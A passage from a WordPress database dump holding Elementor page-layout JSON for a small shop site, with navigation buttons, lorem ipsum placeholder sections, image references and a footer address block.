column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ce1c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#C3C3C321\"},\"elements\":[{\"id\":\"6cb9f56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":0},\"elements\":[{\"id\":\"d4fc894\",\"elType\":\"widget\",\"settings\":{\"view\":\"\",\"icon_list\":[{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"99391c3\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"de33d81\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"4bd4895\"},{\"text\":\"List Item #2\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"6156b25\"},{\"text\":\"List Item #3\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"59990f4\"}],\"icon_align\":\"center\",\"divider\":\"yes\",\"divider_style\":\"dotted\",\"divider_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"32\",\"bottom\":\"32\",\"left\":\"32\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"0e3e07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"c2e40a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8527,1491,'_elementor_page_assets','a:0:{}'),(8529,1492,'_elementor_edit_mode','builder'),(8530,1492,'_elementor_template_type','wp-page'),(8531,1492,'_elementor_version','3.7.7'),(8532,1492,'_wp_page_template','elementor_canvas'),(8533,1492,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"}],\"faq_schema\":\"yes\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST 